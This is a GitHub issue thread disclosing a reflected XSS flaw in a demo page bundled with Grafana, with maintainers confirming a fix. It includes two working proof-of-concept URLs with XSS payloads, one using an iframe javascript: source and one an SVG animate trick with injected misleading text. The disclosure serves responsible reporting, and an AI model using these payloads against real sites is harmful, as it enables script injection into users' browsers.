### ISSUE TITLE
[Bug] Reflected XSS in bundled angular-native-dragdrop demo

### ISSUE THREAD

**Issue by brittag** [grafana/grafana#9248]
The demo file at https://github.com/grafana/grafana/blob/master/public/vendor/angular-native-dragdrop/demo/index.html is vulnerable to reflected XSS. This seems to be a regression from a similar issue filed at https://github.com/grafana/grafana/issues/3104 in October 2015, which was resolved by removing the file in https://github.com/grafana/grafana/pull/3118 in November 2015.

Examples:

`https://EXAMPLE.COM/public/vendor/angular-native-dragdrop/demo/index.html?123=123'"><iframe src='javascript:alert(document.domain)'` - works in Internet Explorer.

`https://EXAMPLE.COM/public/vendor/angular-native-dragdrop/demo/index.html#'"><svg width=12cm height=9cm><a><image href=https://upload.wikimedia.org/wikipedia/commons/thumb/b/bd/Test.svg/315px-Test.svg.png /><animate attributeName=href values=javas&#99ript:alert(document.domain)><h2><b>IMPORTANT: Content which follows is part of the drag-drop plugin demo and not affiliated with this report</b></h2>` - works in Chrome; you can see the effect if you click the image.

I will also report this at the upstream project at https://github.com/angular-dragdrop/angular-dragdrop

I'd recommend that Grafana omit unnecessary files from bundled upstream dependencies, to reduce the risk / surface area for including problems from upstream code.

**Credit to [sergeym](https://hackerone.com/sergeym) and [ysx](https://hackerone.com/ysx) for reporting this issue to my team as part of the [TTS Bug Bounty program](https://hackerone.com/tts)!**

**Comment by bergquist** [comment]
Thank you for reporting this

**Comment by torkelo** [comment]
fixed (via webpack change)
